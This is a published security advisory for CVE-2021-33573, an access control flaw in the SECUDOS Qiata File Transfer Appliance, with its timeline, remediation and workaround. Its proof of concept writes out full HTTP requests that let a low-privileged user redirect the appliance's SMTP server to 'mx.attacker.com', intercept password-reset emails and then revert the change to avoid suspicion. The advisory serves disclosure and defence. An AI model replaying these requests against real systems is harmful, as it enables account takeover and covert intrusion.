SECUDOS Qiata FTA mail settings access control vulnerability

SECUDOS Qiata FTA mail settings access control vulnerability

CVE-2021-33573

Share

Type

  • Access control

Severity

  • Medium

Affected products

  • SECUDOS Qiata File Transfer Appliance

Remediation

  • Update the FTA to version 2.21.0.

Credits

  • Vulnerabilities discovered by William Söderberg of F-Secure Labs and F-Secure Consulting.

Read more

Timeline
2021-04-14Notified Secudos about the identified vulnerability
2021-04-15Vendor acknowledged issue
2021-04-26Patch released in version 2.21.0
2021-08-24F-Secure publishes advisory

Description

F-Secure identified an access control vulnerability in the Secudos Qiata File Transfer Appliance (FTA). This issue could allow a low privileged attacker to escalate their privileges on the system and gain unauthorized access to files and functionality.

Secudos describes the software as follows: “Qiata File Transfer Appliances (FTAs) provide the ability to easily and securely exchange files with internal or external users. Qiata is a user-friendly solution in the form of a specialized web application that is optimized for the task of file transfer. Qiata is not some service on the internet. Qiata is an appliance solution that operates within the enterprise itself.

F-Secure found that both low privileged internal and external users could change the SMTP settings of the FTA.

Impact

Low privileged users can escalate privileges in the system. By changing the SMTP settings to send e-mails to an attacker controlled server, the attacker can initiate a password reset for a victim user, view the reset e-mail, and subsequently change victim user’s password.

Proof of concept

In order to carry out the attack, the attacker must first be authenticated to the system. In a plausible narrative, the attacker might have received a link to a file sent from the FTA, providing an external user session on the Qiata FTA:

GET /cgi-bin/login.fcgi?link=d7d2d6c1-67f1-4f81-839a-73aca4d405b9 HTTP/1.1 Host: 192.168.17.128

The response body contains the “tokenValue” which serves as a session identifier on the FTA:

HTTP/1.1 200 OK Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 X-UA-Compatible: IE=EDGE Set-Cookie: FTALink=d7d2d6c1-67f1-4f81-839a-73aca4d405b9;Path=/;Expires=Thu, 04-Mar-2021 14:46:04 GMT;HttpOnly;Secure Set-Cookie: FTALink=d7d2d6c1-67f1-4f81-839a-73aca4d405b9;Path=/;Expires=Thu, 04-Mar-2021 14:46:04 GMT;HttpOnly;Secure Set-Cookie: FTAUser=8ddd3e2b-73a4-4949-8173-908e38aa7f19;Path=/;Expires=Thu, 04-Mar-2021 14:46:04 GMT;HttpOnly;Secure X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: master-only Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Strict-Transport-Security: max-age=31536000 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 12416

       SECUDOS Qiata File Transfer Service - Transfer Download Seite [... omitted for brevity]  

POST /cgi-bin/transfers.fcgi?isc_dataFormat=xml HTTP/1.1 Host: 192.168.17.128 Content-Length: 645 X_CSRF_Token: 8ddd3e2b-73a4-4949-8173-908e38aa7f19 Content-Type: text/xml Accept: */*

   1f0321fc-e9f5-11de-8199-00248c819310    smtpDataSource0  fetch  smtpForm1  

This returns the SMTP settings including the existing SMTP server address (“smtpAddress”) as seen below:

HTTP/1.1 200 OK Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: master-only Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Strict-Transport-Security: max-age=31536000 Vary: Accept-Encoding Content-Length: 558 Connection: close Content-Type: text/xml

    0     0     1     1                         1f0321fc-e9f5-11de-8199-00248c819310             192.168.17.100             25                                                    false             FTA             fta@f-secure.com             false                                       true              

The SMTP settings are then updated to to send e-mails to an attacker controlled server (“mx.attacker.com”):

POST /cgi-bin/transfers.fcgi?isc_dataFormat=xml HTTP/1.1 Host: 192.168.17.128 Content-Length: 645 X_CSRF_Token: 8ddd3e2b-73a4-4949-8173-908e38aa7f19 Content-Type: text/xml Accept: */*

             1f0321fc-e9f5-11de-8199-00248c819310         mx.attacker.com         FTA         fta@f-secure.com         false                           true         false                            smtpDataSource0     update     smtpForm1

The 200 response code and response body returned confirms that these details have been updated:

HTTP/1.1 200 OK Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: master-only Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Strict-Transport-Security: max-age=31536000 Vary: Accept-Encoding Content-Type: text/xml Content-Length: 491

    0                           1f0321fc-e9f5-11de-8199-00248c819310             mx.attacker.com             25                                                    false             FTA             fta@f-secure.com                          false                                                                      

With the server reconfigured, the attacker can now initiate a password reset for a target user, gaining access to their account. Once the attack has concluded, the same attack vector can be used to change back the SMTP settings in order to avoid raising suspicion.

Workaround

Restricting outbound SMTP traffic from the FTA to the Internet. Only permit SMTP traffic to whitelisted destinations.